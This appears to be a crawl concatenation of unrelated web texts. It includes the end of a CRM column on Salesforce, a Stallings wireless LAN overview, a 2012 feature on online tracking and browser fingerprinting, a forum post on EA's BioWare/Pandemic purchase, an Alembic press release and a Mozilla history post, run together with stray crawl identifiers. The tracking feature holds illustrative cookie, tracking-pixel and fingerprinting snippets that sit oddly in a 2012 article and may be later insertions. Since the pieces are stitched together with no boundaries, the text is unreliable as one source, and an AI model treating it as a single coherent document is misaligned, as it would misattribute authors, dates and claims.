“No Software” wasn’t just a marketing slogan — it was a mantra. Sure, we all laughed at Benioff’s seemingly quixotic battle against Siebel Systems — but he needed the biggest target he could find in his market. Along with a growing band of believers, he hammered away relentlessly. The Salesforce.com initial offering had few of the features and little of the functionality of the traditional CRM product but, in a world buffeted by a succession of long, expensive, and often failure-prone implementations, Salesforce.com’s solution delivered the one virtue the traditional vendors could not: It worked. Within an incredibly short time, users could be up and running and productive. Competitors tried to emulate Salesforce.com’s success but always seemed constrained by the conventional software box. It’s doubtful that any of them fully shared Benioff’s vision of a wholly on-demand world, and most were happy to compete on low prices rather than the true advantages of software-as-a-service. In the end, even the most-probable contenders proved unable to compete, and companies such as UpShot and Salesnet were absorbed into other entities.Today, 10 years on, Salesforce.com is a billion-dollar company and the software industry has been irreversibly changed. This disruption and the industry spawned by Benioff and his company and his vision represent the epitome of business evolution, which, after all, has no goal other than to produce the most fit result for the present moment. It remains to be seen whether Benioff, in this new moment he helped create, will uncover another quixotic quest of the same magnitude. No matter what, it’ll certainly be interesting to watch. Denis Pombriant, founder and managing principal of CRM market research firm and consultancy Beagle Research Group, has been writing about CRM since January 2000, and was the first analyst to specialize in on-demand computing. His 2004 white paper, “The New Garage,” laid out the blueprint for cloud computing. He can be reached at [email protected], or on Twitter (@denispombriant).You may leave a public comment regarding this article by clicking on "Comments" at the top.To contact the editors, please email [email protected]. Every month, CRM magazine covers the customer relationship management industry and beyond. To subscribe, please visit http://www.destinationCRM.com/subscribe/. | 计算机 |
2015-48/3682/en_head.json.gz/1222 | Wireless/High Speed/Optical
Wireless LANs
By William Stallings
␡ Wireless LAN Applications
Wireless LAN Requirements
IEEE 802.11 Services
IEEE 802.11 Options
In his fifth article in a seven-part series, network expert Bill Stallings provides an overview of wireless LANs and the IEEE 802.11 standards.
From the author of
From the author of
Local and Metropolitan Area Networks, 6th Edition
From the author of
In just the past few years, wireless LANs have come to occupy a significant niche in the local area network market. Increasingly, organizations are finding that wireless LANs are an indispensable adjunct to traditional wired LANs, to satisfy requirements for mobility, relocation, ad hoc networking, and coverage of locations difficult to wire.
As the name suggests, a wireless LAN is one that makes use of a wireless transmission medium. Until relatively recently, wireless LANs were little used. The reasons for this included high prices, low data rates, occupational safety concerns, and licensing requirements. As these problems have been addressed, the popularity of wireless LANs has grown rapidly.
Wireless LANs Applications
Early wireless LAN products, introduced in the late 1980s, were marketed as substitutes for traditional wired LANs. A wireless LAN saves the cost of the installation of LAN cabling and eases the task of relocation and other modifications to network structure. In a number of environments, there is a role for the wireless LAN as an alternative to a wired LAN. Examples include buildings with large open areas, such as manufacturing plants, stock exchange trading floors, and warehouses; historical buildings with insufficient twisted pair wiring or where drilling holes for new wiring is prohibited; and small offices where installation and maintenance of wired LANs is not economical. In all of these cases, a wireless LAN provides an effective and more attractive alternative. In most of these cases, an organization will also have a wired LAN to support servers and some stationary workstations. For example, a manufacturing facility typically has an office area that's separate from the factory floor but that must be linked to it for networking purposes. Therefore, typically, a wireless LAN will be linked into a wired LAN on the same premises. Thus, this application area is referred to as a LAN extension.
Figure 1 shows a simple wireless LAN configuration that's typical of many environments. A backbone wired LAN, such as Ethernet, supports servers, workstations, and one or more bridges or routers to link with other networks. In addition, a control module (CM) acts as an interface to a wireless LAN. The control module includes either bridge or router functionality to link the wireless LAN to the backbone. It also includes some sort of access-control logic, such as a polling or token-passing scheme, to regulate the access from the end systems. Notice that some of the end systems are standalone devices, such as a workstation or a server. Hubs or other user modules (UMs) that control a number of stations off a wired LAN may also be part of the wireless LAN configuration.
Single-cell wireless LAN configuration.
The configuration of Figure 1 can be referred to as a single-cell wireless LAN; all of the wireless end systems are within range of a single control module. Another common configuration is a multiple-cell wireless LAN. In this case, multiple control modules are interconnected by a wired LAN. Each control module supports a number of wireless end systems within its transmission range. For example, with an infrared LAN, transmission is limited to a single room; therefore, one cell is needed for each room in an office building that requires wireless support.
Another use of wireless LAN technology is to support nomadic access by providing a wireless link between a LAN hub and a mobile data terminal equipped with an antenna, such as a laptop computer or notepad computer. One example of the utility of such a connection is to enable an employee returning from a trip to transfer data from a personal portable computer to a server in the office. Nomadic access is also useful in an extended environment such as a campus or a business operating out of a cluster of buildings. In both of these cases, users may move around with their portable computers and may want access to the servers on a wired LAN from various locations.
Another example of a wireless LAN application is an ad hoc network, which is a peer-to-peer network (no centralized server) set up temporarily to meet some immediate need. For example, a group of employees, each with a laptop or palmtop computer, may convene in a conference room for a business or classroom meeting. The employees link their computers in a temporary network just for the duration of the meeting.
Network Your Computer & Devices Step by Step
By Ciprian Rusen
Cisco LAN Switching Fundamentals
By David Barnes, Basir Sakandar
eBook (Adobe DRM) $38.40
the trusted technology learning source | 计算机 |
Security Feature
Who's tracking you online?
What happens behind the scenes when you browse the web? Companies are collecting, analysing and selling your profile without your knowledge or permission. We investigate what's going on and explain what you can do about it. Updated 12th September 2012
Find out who is spying on your web browsing and how to beat them
Martyn Casserly
12 Sep 12
Surf using your browser's private mode to keep trackers at bay
The internet is undoubtedly one of the greatest inventions of the modern age. Never in all of history have so many people had access to so much information, easily and - for the most part - for free. Projects such as Wikipedia have shown what can be achieved by an ideology to do good and harness the power of the masses working together for a common goal.
Where previous generations in need of knowledge had turned to the Encyclopedia Britannica (if they were fortunate enough to own the multi-volume repository), people now access its online contemporaries - Google and Wikipedia - or simply ask a question on Twitter. Even Britannica itself has replaced the famous leather tomes with a subscription-based website that's better equipped to keep up with the public's constant thirst for knowledge.
Social media has grown at a phenomenal rate and with it transformed our ability to communicate on a wide scale. Tracking down old friends and colleagues is no longer the preserve of amateur detectives with a battered book of phone numbers and addresses circa 1993.
Now it’s simply a case of going on Facebook and typing in their name - unless of course they happen to be called John Smith or Patrick Murphy, then you might still be in for a spot of sleuthing.
We have available to us an incredible number of online services such as Skype, Gmail, Google Docs, Twitter, Facebook, Dropbox, and innumerable websites that have now become an essential part of people's lives - all of which offer their wondrous bounty for the princely sum of naught. Truly this is a golden age for technology and for those who have the good fortune to use it. But how does this make any sense at all?
We know that businesses need to make money to even exist, let alone thrive. Google’s data centres are famously home to thousands of computers, each holding fragments of the world wide web within them. YouTube users upload over 48 hours of video to the site every minute, which works out to a staggering 8 years of content every day. Facebook is currently home to over 900 million users, giving it a population greater than most countries.
We don’t pay to search, upload badly taken photographs of school plays, or watch little pandas sneezing, yet Google is one of the most profitable companies in the world and when Facebook recently went public it was valued at a whopping £66 billion. So how do they do it? What’s the secret to their success? Well, technical brilliance aside, the answer is very simple. It’s you. Or more accurately, what you like. Or even more accurately, what you are likely to buy.
The free services we access on a daily basis are watching us, where we go, what we do, and using that information to provide their advertisers, or in some cases other people’s advertisers, with profiles that enable them to sell to us more effectively and increase the chance that we will click the ‘add to basket’ button. As the saying goes ‘If you’re not paying for it, you’re not the customer; you’re the product being sold’.
Online tracking
During his recent TED talk ‘Tracking the Trackers’, Mozilla CEO Gary Kovacs discussed the idea of Behaviour Tracking and its proliferation across the web. In essence, when you visit a website a cookie is created in your browser which allows the site to know you are there and helps perform basic tasks such as maintaining the contents of your shopping basket while you continue to browse the site.
They can also gather information on the pages you visit and items you click on, so that the contents you are offered are more relevant to your tastes. Generally they enhance the browsing experience (just try disabling all cookies in your browser privacy settings to see how clunky the web can really be) and often save us from having to log in or set preferences every time we visit a favourite site.
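To make the shopping-basket example concrete, here's a minimal sketch - in browser-side TypeScript, with an invented cookie name - of the sort of first-party cookie a shop might set and read. It isn't any particular retailer's code, just an illustration of the mechanism.

```ts
// Hypothetical first-party cookie: remembering a shopping-basket ID between pages.
// The cookie name ("basket_id") and the seven-day lifetime are invented for illustration.
function setBasketCookie(basketId: string): void {
  const expires = new Date(Date.now() + 7 * 24 * 60 * 60 * 1000).toUTCString();
  // "path=/" makes the cookie available on every page of this site (and only this site).
  document.cookie = `basket_id=${encodeURIComponent(basketId)}; expires=${expires}; path=/`;
}

function getBasketCookie(): string | null {
  // document.cookie is a single "name=value; name=value" string for the current site.
  const entry = document.cookie
    .split("; ")
    .find(item => item.startsWith("basket_id="));
  return entry ? decodeURIComponent(entry.split("=")[1]) : null;
}
```

A cookie like this is only ever sent back to the site that created it, which is why your basket survives from one page to the next.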
All of this is perfectly acceptable, in fact it’s helpful, but the issue Kovacs was discussing happens after you leave the site in question and go elsewhere.
Traditionally you would expect a site to retain the information on the cookie for the duration of your stay and then for it to become inert once you leave. But that isn't always the case. Third-party cookies are now very likely to also be watching our movements, sometimes across several sites - and we have never given our consent to any of them.
The effects are easy to observe, in fact you’ve probably already seen them several times. By simply browsing or searching for details on, say, the new Batman film it won’t be long until related products begin appearing in the advertisements on other sites you visit, sometimes with unnerving accuracy.
This is made possible by the relationships between the host sites and online advertising companies such as Scorecard Research, Tribal Fusion and Google’s own DoubleClick. The idea is to provide you with a more tailored experience online, and of course tempt you to click through to the item in question and make a purchase.
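The mechanics are simple enough to sketch. A publisher pastes in a snippet served from the advertising company's own domain - an invisible image or script - and because that domain is the same on every participating site, the advertiser's cookie travels with each request and your visits can be stitched together into one profile. The code below is a hypothetical illustration; 'ads.example-network.com' is an invented address, not a real ad network.

```ts
// Hypothetical tracking pixel of the kind a publisher might paste into its pages.
// Every page that includes this sends the current URL to the ad network's domain,
// and the browser attaches whatever cookie that domain has previously set.
function loadTrackingPixel(): void {
  const pixel = document.createElement("img");
  pixel.width = 1;
  pixel.height = 1;
  pixel.style.display = "none";
  // The page being read is passed along as a query parameter.
  pixel.src =
    "https://ads.example-network.com/pixel?page=" +
    encodeURIComponent(window.location.href);
  document.body.appendChild(pixel);
}

loadTrackingPixel();
```

Repeat that across thousands of publishers and the network can compile a browsing history for a single cookie ID without you ever visiting its site directly.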
Revenue generated from these advertisements is quite staggering. In 2011 Google was reported to have made $37 billion, with nearly all of it coming from its AdWords and AdSense income streams. Facebook also raked in a highly respectable $3.7 billion with 85% coming from advertising. As you can see from the figures it’s no surprise that companies are very keen to know what we want to buy, and the most effective way to place those products in front of us.
The idea of our habits being monitored, especially by those that would seek to profit from it, is an uncomfortable truth that now accompanies our heavily interconnected online world. Gary Kovacs puts it very eloquently: "We are like Hansel and Gretel, leaving bread crumbs of our personal information everywhere we travel through the digital woods".
Mozilla Collusion
To observe the scale of the tracking that goes on, Mozilla has developed the Collusion Project, alongside its Firefox plugin, which displays the tracking cookies in a fashion similar to cells under a microscope - and it doesn't take long for those cells to multiply.
"On a technical level, Collusion plugs into your browser and watches all of these requests to web sites and third parties involving cookies", explains Mozilla's Ryan Merkley. "Firefox already makes a record of some of this (your browsing history) and Collusion is recording a little bit more so it can be drawn on your screen. The more you browse, the more Firefox and Collusion accumulate about the site relationships, and your graph gets larger."
That’s something of an understatement. In an experiment to see how widespread the behaviour was we cleared the browser history on one of our machines, installed Collusion, then visited some normal, everyday favourites from our bookmarks: The Guardian, Football365, Facebook, Twitter, and a few others. After viewing just nine sites, and spending less than 20 minutes online, we had been tracked by thirty five third-party cookies.
In another test we reset the browser and visited the site of a popular high-street video game retailer - the results were startling. By just landing on the home page we saw eleven third-party links appear on our Collusion graph. Ryan Merkley’s initial experience of the application was equally concerning.
"I first tried Collusion when one of our engineers shared an early proof of concept," he says. "I was shocked at the number of trackers, and most of all, by the number of times a very small group of trackers showed up. Those few trackers know more about my combined browsing habits than any website ever would. It made me want to know how they use that data, and have a tool to decide for myself whether they would be able to collect my data at all."
It’s not just the secret third-parties that watch what we do, sometimes it’s sites that we trust. In late 2011 blogger Nik Cubrilovic wrote a blog post that showed how Facebook was using persistent cookies that could track web use even after users had logged out from its site.
The news that the social media giant might be quietly watching external online behaviour quickly spread across the internet and brought angry responses on blog posts and forums (which, to be fair, are not unusual places for that sort of reaction).
Facebook immediately addressed the issue and went to lengths to reassure people that it hadn't gathered information, and that the cookies were instead used as a form of security against spammers and unauthorised log-ins. Others worked with the 'Like' functions found on various sites around the web. Within two days of his post Facebook fixed the apparent bugs and Cubrilovic confirmed this on his blog, along with thanks for the speedy resolution.
Then, shortly afterwards, Cubrilovic was contacted by a friend on Twitter who had found a third-party site on which Facebook had set one of the previously offending 'datr' cookies, only now it was capable of sending information back to Facebook without the user ever having logged in.
The cookie worked behind the ‘Like’ function on the page and was able to identify the user even if they didn’t interact with the widget. Cubrilovic investigated further and found several other sites that now had these cookies active.
Facebook was once again quick to respond, saying that this wasn’t a re-enabling of the cookies but rather a bug that affected certain sites that called the API in a non-standard way. Once again it fixed the issue and assured users that it didn’t build profiles using this kind of data.
It’s reasonable to accept what Facebook says; after all it did move to plug the gaps quickly and was public about its reasons for using cookies. However, this isn’t the only occasion on which its attitude to the privacy of user data has been brought into question.
Several times in the past few years it has introduced new functions to the site and automatically opted users in, often making data that was previously private suddenly public - at least until tech-savvy users sent around instructions on how to reverse the problem.
The latest instance was in June, when Facebook replaced every user's email address with an @facebook.com alternative without asking their permission or even letting them know that it had happened. A story also emerged in July revealing the existence of a Facebook 'Data Science' department, which analyses the information the company gathers on its users to search for patterns that it may be able to use.
In an article that appeared on MIT's Technology Review site, Tom Simonite reported that one of the team of data scientists - Eytan Bakshy - had conducted a subtle experiment. According to Simonite, Bakshy 'messed with how Facebook operated for a quarter of a billion users.
Over a seven-week period, the 76 million links that those users shared with each other were logged. Then, on 219 million randomly chosen occasions, Facebook prevented someone from seeing a link shared by a friend.
Hiding links this way created a control group so that Bakshy could assess how often people end up promoting the same links because they have similar information sources and interests.’ The theory might be interesting, and the results possibly useful, but the methods of obtaining the information remain highly questionable.
Who else is tracking you?
Of course it’s not only Mark Zuckerberg and his social scientists that are watching our clicks with interest. Twitter was in the news recently when it was revealed that the micro-blogging company had sold two years' worth of archived Tweets to data research company DataSift.
Social media app Path was found to be uploading the entire contact list from iPhones without the consent of their owners. Android phones (mainly in the US) were being sold with Carrier IQ software installed that some analysts believed was capable of tracking keystrokes and text messages.
Last February, The Wall Street Journal reported that Google had been tracking users of Apple’s mobile Safari browser through cookies that acted as if the user had granted permission for ads to be displayed. During the investigation it was discovered that a few other large advertising companies were also using similar coding to capitalise on the loophole in Safari.
Google responded that the newspaper mischaracterized what happened and said in a statement that it ‘used known Safari functionality to provide features that signed-in Google users had enabled. It's important to stress that these advertising cookies do not collect personal information.’
Whatever the justification, Google promptly disabled the code and Apple set about closing the loophole in its browser. As we go to press there is widespread reporting that the US Federal Trade Commission is about to fine Google $22.5 million for the breach of privacy. This would make it the single biggest penalty the government body has ever handed out. The search giant also drew criticism from privacy groups after it announced the unification of its privacy policy. Previously each of its wide range of services had an individual policy, specifically tailored to the nature of the application. When it decided to bring over sixty of them together under one banner, it also meant that the services themselves would share information to build up a better picture of the user and their practices.
Google wasn’t collecting more information, but due to the composite nature of the different sets of data there’s no doubt that the information was more valuable to advertisers. Recently at the Google I/O developers conference the company also revealed a new feature for its Android mobile operating system - Google Now.
This acts as a personal assistant similar to Apple's Siri, but the aim of Now is for it to learn about your behaviours - where you live, how you travel, foods you like to eat, places you like to shop - and try to provide you with information relevant to your interests, using location services to know where you are and the possibilities that exist around you. It's hugely ambitious, possibly brilliant, but it also means once more that your privacy is brought into a questionable area when a device is tracking essentially how you live.
In response to the ever-increasing issues surrounding privacy, EU law has put in place the e-Privacy Directive. This basically states that no user should be tracked without their consent. You may have noticed pop-up boxes that now appear at the top of websites announcing that they use cookies and asking you either to click to accept this or, in some cases, simply to continue using the site, which will be taken as a form of consent.
The short explanations very rarely mention anything about third-party cookies and often only appear the first time you visit the site, meaning that if users just continue as normal then they will be tracked in the same way they were before.
To be more informed of how the site will use cookies, you need to click on the privacy policies option that is usually highlighted in the messages. Sometimes you can select which cookies will be used, the BBC website being a good example here.
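From the website's side, complying with the directive boils down to not loading anything non-essential until the visitor has agreed. A minimal, hypothetical sketch of that gating logic (all names and addresses are invented):

```ts
// Hypothetical consent gate: optional analytics/advertising scripts are only
// loaded once the visitor has explicitly accepted them. All names are invented.
function hasConsented(): boolean {
  return document.cookie.split("; ").includes("cookie_consent=accepted");
}

function loadOptionalScripts(): void {
  const script = document.createElement("script");
  script.src = "https://analytics.example.com/tracker.js"; // placeholder address
  document.head.appendChild(script);
}

function recordConsent(): void {
  // Remember the choice for a year, then load the optional extras.
  document.cookie = "cookie_consent=accepted; max-age=31536000; path=/";
  loadOptionalScripts();
}

if (hasConsented()) {
  loadOptionalScripts();
}
// Otherwise show the banner and call recordConsent() when "Accept" is clicked.
```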
What you can do to avoid being tracked
For a more permanent solution it would be wise to consider using the ‘Private’ or ‘Incognito’ browsing modes that stop sites from adding permanent cookies or tracking your web history.
Another sensible move is to visit the security settings in your browser of choice and look for the ‘Do Not Track’ or ‘Do not allow third-party cookies’ option. Plug-ins such as Ghostery are available for most browsers and offer an enhanced level of security, while Internet Explorer users can also use the ‘Tracking Protection Lists’ function that enables them to subscribe to lists of known offending sites, and have their browser deny them placing cookies on your machine.
Sadly even these settings can be overcome by something called Device Fingerprinting. Your system is made up of lots of small details - such as browser type, operating system, plugins, and even system fonts - that can be scanned and interrogated to reveal an individual digital ‘fingerprint’ that identifies your machine from any other on the web.
The Electronic Frontier Foundation is a digital rights group which campaigns against these invasions of civil liberties. To illustrate the effectiveness of Device Fingerprinting it set up the Panopticlick website which allows users to see how identifiable their systems really are. We tested our road-worn laptop and were slightly unnerved to discover that out of the 2,287,979 users that had scanned their machines on the site ours was unique and therefore trackable.
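To make the idea concrete, here is a minimal sketch (not Panopticlick's actual code) of how a handful of attributes that every browser reports anyway can be combined into a practically unique identifier. The attribute names and values below are invented for illustration.

```python
import hashlib

def fingerprint(attributes: dict) -> str:
    # Join the attributes in a stable order and hash them into a short ID.
    canonical = "|".join(f"{key}={attributes[key]}" for key in sorted(attributes))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()[:16]

# Illustrative values of the kind a site can read from headers and scripts.
visitor = {
    "user_agent": "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
    "accept_language": "en-GB,en;q=0.5",
    "screen": "1366x768x24",
    "timezone_offset": "0",
    "installed_fonts": "Arial;Calibri;Comic Sans MS;Consolas",
    "plugins": "Flash 11.2;Java Deployment Toolkit",
}

print(fingerprint(visitor))  # the same machine produces the same ID on every visit
```

No cookie is stored, so clearing cookies or browsing privately does not change the result; only altering the underlying attributes does.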
Some would argue that the ability for companies to track our interests is a fair price to pay for the services we receive. After all, websites are only offering opportunities for advertisers to pitch at us. Television, radio, and cinema all do the same thing and use demographic profiling to promote certain products at calculated times - hence all the beer and crisp commercials during football coverage.
No-one forces us to use social networks although if you do it will invariably be one of the big three, as you’ve no hope of finding friends on any other. Plus, there are alternatives to all of Google’s offerings. Is it such a bad thing that we are being watched? Well it all depends on who is doing the watching...and why.
The law on privacy
Currently negotiating its way through parliament is the government’s ‘Communications Data Bill’, or ‘Snooping Bill’ as opponents prefer to call it. This radical restructuring of British law would force ISPs to retain communications data for all emails, web browsing, and even mobile phone use in the UK.
The authorities would then be able to access the information in a limited capacity at any time, or in its entirety when granted a warrant. The government is also claiming that it will be able to decode SSL encryption as part of the process.
For a nation that’s already often heralded as the most surveillance-heavy country in the world this seems to many like a step too far. What some privacy campaigners see as the real problem though isn’t necessarily the government prying into our digital lives (although that’s obviously a concern that they rate highly), but rather the fact that so much information about us will be collected and stored, with potentially dangerous consequences.
Most of us would agree that although we might not always like how our elected officials behave, we still have a reasonably accountable government. We could also agree that while companies like Facebook and Google make money from us in a less than transparent manner, they too are not out to harm us in any way. But the fact that they're all intent on assembling hugely detailed data sets about us poses a problem if that information is ever used by organisations or individuals that are not so benign.
In January 2010 Google announced that it had been the victim of a ‘sophisticated cyber attack originating in China’. The hackers had gone after the email addresses of human rights activists, journalists, and some senior US officials. Wikileaks then released leaked cable communications that suggested a senior member of the Chinese Politburo had been involved in the attacks.
Some reports suggested that the motives behind the attack were to identify and locate political dissidents who were speaking out against the government’s human rights records. 2011 saw the rise to prominence of the ‘Hacktivist’, modern day protestors against what they see as abuses of civil liberties or digital freedom.
Among the high-profile victims of groups such as Anonymous and LulzSec are Sony, the US Bureau of Justice, our own Ministry of Justice, the Home Office, several Chinese government sites and even the Vatican...twice. In fact Verizon released figures reporting that over 100 million users’ data had been compromised by the groups in the past year.
Although the motivations of Hacktivists are generally more positive ones, the ease in which they seem to be able to either bring down or infiltrate supposedly secure sites should bring into question the wisdom of having so much personal information stored in one location, undoubtedly attached to the internet.
So what can we do? Well, at the moment the Communications Data Bill isn’t yet law, so contacting your MP would be a good place to start. In fact, getting as many people as possible to contact their MPs would be a better place.
Change your online habits
But a more immediate solution is simply to be aware that whatever you put online is no longer private. Use tools such as Collusion to monitor who is watching you.
Change your browser security settings to stop these cookies being stored in the first place, and regularly clear out histories and cookies to remove those that slip through the net. Limit the use of location services, resist clicking the 'Like' button, and even use a different browser for your social networks entirely.
The more cautious could boot a Linux operating system from a USB flash drive when using public Wi-Fi, or download the new Wi-Fi Guard from AVG. In the end, though, the most potent weapon we can use against those who would try to track us and profit from it is an awareness of what might be happening.
Call in the professionals
Allow is a UK company that specialises in helping you manage your online profile. Its new subscription-based plan offers services such as searching the web to see what marketing databases your name appears on and helping remove you from them, a Google Chrome ad-blocking plug-in, and an email tool which randomly generates addresses for filling out forms or subscribing to websites anonymously, but which you can access from the Allow website.
There are also social media tools which analyse your privacy settings to warn you of any dangers to your data, and a profiling service that tells you how potential employers would view your public content. The whole package is new and could well prove useful. Prices are still being finalised, but expect to pay around £6 per month.
A few simple ways to protect yourself
Limit the information you share publicly. If including your birthday in a social network profile, avoid putting the year - this is a key identifier which trackers use to pinpoint you in a crowd of John Smiths.
Use a secondary email address when registering for websites, forums, competitions, or shopping. Hotmail and Yahoo offer free accounts which are quick to set up.
Use one browser for general web-activities and another for more sensitive information. Also avoid the ‘Like’ or ‘+1’ buttons on sites.
Change your passwords regularly and don’t use the same one on all your accounts. Use a password manager so you don't have to remember them all.
Make sure any browser you use has the Privacy settings switched on. Generally their default setting is 'off'.
The internet is growing up and maturing into a stunningly powerful tool and an amazing place to explore. Like any scene of great adventure there are a few dangers to negotiate along the way.
We shouldn’t let the fear of a Big Brother state or shadowy data brokers deny us the advantages of services like Google or Facebook, and if we’re careful to limit the important data we share then we should be able to protect ourselves in some measure.
Ryan Merkley from Mozilla sums it up rather well, "Tracking is a complicated issue, and a no-tracking universe probably isn't the answer. We want users to be informed and in control of their web experience: the more they know, the less likely anyone can track them without their knowledge. In the long run, informed and empowered users has always been the best thing for the web."
Johnyboy said: With governments trying to obtain all this information about people they do not like and their increasing ability to wipe anyone out by remotely controlled "drone", it may soon be advisable to rein in our thoughts for fear of an untimely death perpetrated from anywhere in the world. Just look at the US and their (to them) legalised murder in Pakistan. Even this missive will probably be stored and could be searched in the future by keywords.
Condom said: While reading this I noticed that my ad blocker was showing 17 organisations were trying to track me. It tells me it has blocked them, but who really knows?
2015-48/3682/en_head.json.gz/1582 | Join Date Jan 2006 Posts 1,755 EA buying BioWare/Pandemic for $860M
Update: Superdeveloper scooped up by megapublisher for a staggering sum, deal to close in January; deal covers 10 IPs, including Mass Effect, Mercenaries, and unnamed Wii and DS games.

A week jam-packed with Nintendo news was overshadowed today by an announcement that sent shockwaves through the North American game industry. Thursday afternoon, top publisher Electronic Arts announced that it will acquire VG Holding Corp., owner of BioWare/Pandemic.

VG Holding Corp. was formed in late 2005 when esteemed Canadian role-playing game studio BioWare formed the aforementioned "superdeveloper" with Californian shop Pandemic Studios. The union was funded by Elevation Partners, a venture capital firm with rock star Bono on its board, and brokered by then-Elevation board member John Riccitiello, who became BioWare/Pandemic's CEO. At the time, the deal was seen as a break from the traditional developer-publisher relationship, which sees the former beholden to the latter for funding. However, when Riccitiello returned to his old job as EA CEO, many wondered if the move might presage a takeover bid of BioWare/Pandemic. These suspicions were further raised when EA agreed to distribute the Pandemic shooter Mercenaries 2: World in Flames under its EA Partners program.

When the BioWare/Pandemic deal was announced, Elevation made much of the fact the union represented a "combined investment" of more than $300 million, including future funding. Today, the company got a massive return on said investment, with EA paying $620 million in cash to the stockholders of VG Holding Corp. In addition, the publisher will issue an additional $155 million in equity to unidentified VG Holding employees, as well as assume $50 million in outstanding VG stock options, and will lend VG $35 million to fund the transition.

In return for paying a princely sum, EA becomes the owner of both BioWare's and Pandemic's original properties. Jade Empire, Mass Effect, and Dragon Age are among BioWare's original IP, which does not include such licensed hits as the Dungeons and Dragons-based Neverwinter Nights, Star Wars: Knights of the Old Republic, or the DS Sonic RPG. BioWare is also working on an unnamed massively multiplayer online role-playing game. Pandemic is best known for the Full Spectrum Warrior and Mercenaries series, as well as the THQ-owned Destroy All Humans! and LucasArts-owned Star Wars: Battlefront franchises.

However, EA was relatively cagey about which BioWare/Pandemic games will become EA properties. The announcement only mentioned one BioWare (Mass Effect) and two Pandemic games (Saboteur, Mercenaries) by name. However, it did say the two studios have "10 franchises under development, including six wholly owned games."

Pending regulatory approval, EA's takeover of BioWare/Pandemic will be final in January 2008. Both studios will become part of the EA Games division, run by Frank Gibeau, with Greg Zeschuk and Ray Muzyka continuing to run BioWare, and Andrew Goldman, Josh Resnick, and Greg Borrud staying in charge of Pandemic. The two studios employ 800 people in Los Angeles; Austin; Edmonton; and Brisbane, Australia.

[UPDATE] In a conference call with analysts after the announcement, EA executives shed some light on the motivation behind the deal. Besides the impeccable pedigree of both studios, Riccitiello said that the "acquisition fills out a gap in [EA's] genre line-up," specifically the role-playing and action-adventure markets.

The executive also cited BioWare's forthcoming MMORPG as a huge opportunity for "further expansion into the MMO space." Although the implication is that the BioWare MMORPG is an original IP, Riccitiello and his associates steered clear of saying so specifically. He did say that the deal will make EA the owner of the Mass Effect, Jade Empire, Mercenaries, Full Spectrum Warrior, and Saboteur properties. The executive also said that EA "expect[s] to bring 10 franchises to market in the next few years; six of which are wholly owned." No mention was made of Dragon Age, BioWare's little-seen fantasy title. Later, Gibeau said that number includes "many titles that have not yet been announced that we will be announcing in the near future." These include "several unannounced titles that are targeted both at the Wii and DS." The two studios' combined operations are expected to yield around four or five games each year for the next three fiscal years.

On the financial side, EA CFO Warren Jenson said that he expects games from the two studios to generate over $300 million in annual income during EA's 2009 and 2010 fiscal years. (EA's 2009 fiscal year begins on April 1, 2008.) He later said that number would increase once the BioWare MMORPG launches "in the back half" of that period.
Sony Pictures Imageworks
LUCASFILM AND SONY PICTURES IMAGEWORKS RELEASE ALEMBIC 1.1
ALEMBIC is an open source exchange format that is becoming the industry standard for exchanging animated computer graphics between content creation software packages.

LOS ANGELES, CA, August 5, 2012 - Alembic 1.1, the open source project jointly developed by Sony Pictures Imageworks (SPI) and Lucasfilm Ltd., released its newest improvements and updates at this year's ACM SIGGRAPH Conference.

Joint development of Alembic was first announced at SIGGRAPH 2010, and Alembic 1.0 was released to the public at the 2011 ACM SIGGRAPH Conference in Vancouver. The software focuses on efficiently storing and sharing animation and visual effects scenes across multiple software applications. Since the software's debut last year, both companies have integrated the technology into their production pipelines: ILM notably used it for work on the 2012 blockbuster The Avengers, and Sony Pictures Imageworks on the 2012 worldwide hits Men in Black 3 and The
Milestone: Phoenix 0.1 released, first version of Firefox
dboswell
May 13, 2013
September 23, 2002: Phoenix 0.1 is released, the first version of a browser that will be renamed to Firebird and then Firefox
Share in the comments any memories you have of this event, photos of any t-shirts from this period or any other interesting pieces from this time in Mozilla’s history. The information shared here will help us visually create the history of Mozilla as a community.
Categories: History
Caspy7
wrote on May 14, 2013 at 2:11 am:
I think my brain must have deleted that theme from memory.
Or is it possible I was still on the suite and missed it?
wrote on May 14, 2013 at 12:12 pm:
The start of Firefox (originally called mozilla/browser, then Phoenix, then Firebird, then Firefox) happened because various key hackers in Mozilla (some of whom were Netscape employees) were fed up of the control Netscape exercised over the Mozilla suite – particularly in terms of the UI, but also the design-by-committee kitchen-sink feature list. The original group as I remember it were: Dave Hyatt, Blake Ross, Pierre Chanial, Ian Hickson and Asa Dotzler. Checkin rights to their part of the tree were not available to anyone else, although patches would be considered. Hixie wrote an extremely unapologetic FAQ on this point (which I’d like to find a copy of, but can’t at the moment), which led to me referring (perhaps unfairly) to their development process in an email to Brendan as “arrogant cathedral-style”.
Our habit of choosing already-taken names for our products began around this time. Phoenix was the name of an open source Java Server framework and of a mail client. (Chimera, which became Camino, was actually the name of an existing _browser_, which lived at http://www.chimera.org at the time, and might have been the same as this one. It has been suggested that Dave Hyatt's naming research was a little… perfunctory.) Amusingly enough, I have an email from shaver which says "It's way, way [too] late to be changing the name of our Phoenix". This was before we changed it – twice. The final nail in the coffin was an approach from the Phoenix BIOS people because of their Phoenix FirstView Connect product. By December it was clear that a rename was going to be necessary.
Here’s a document that Mozilla staff wrote for a CNet reporter (although she never saw it before writing her article) about Phoenix, which we then agreed to publish somewhere. It’s interesting because of the insight it gives into the direction Mozilla was moving in at the time.
Mozilla.org is hosting a small, experimental project exploring development of a cross-platform, XUL and Gecko-based stand-alone browser application. The project is known as Phoenix. Phoenix is roughly analogous to the Chimera project, which mozilla.org is also hosting. Chimera is a new browser for the Macintosh platform built using Gecko and a native toolkit for the Macintosh to give Mac users the native look and feel they so desire. Phoenix is our stand-alone browser experiment for Linux and Windows. We don’t yet know how much effort will go into Phoenix or whether it will produce interesting results. We’re interested in this project because:
1. Phoenix exercises the Mozilla application framework in an illuminating way. We now have an application toolkit which has reached a 1.0 status, and which was created with browser-related projects in mind. What better way to test it out than to iterate once again a build a focused browser application. Our current application suite showcases what can be done to promote integrated applications. A project focusing on using Mozilla technology to create a single, stand-alone browser application may teach us new things. Perhaps we’ll find shortcomings in our XUL 1.0 capabilities. Or perhaps we’ll find that it’s an even better toolkit than we expected.
2. Phoenix explores the idea of decoupling the various applications which create our current application suite. We’ve received requests for a stand-alone browser for quite some time. Now that Mozilla 1.0 has been released, we can accommodate this type of experimentation.
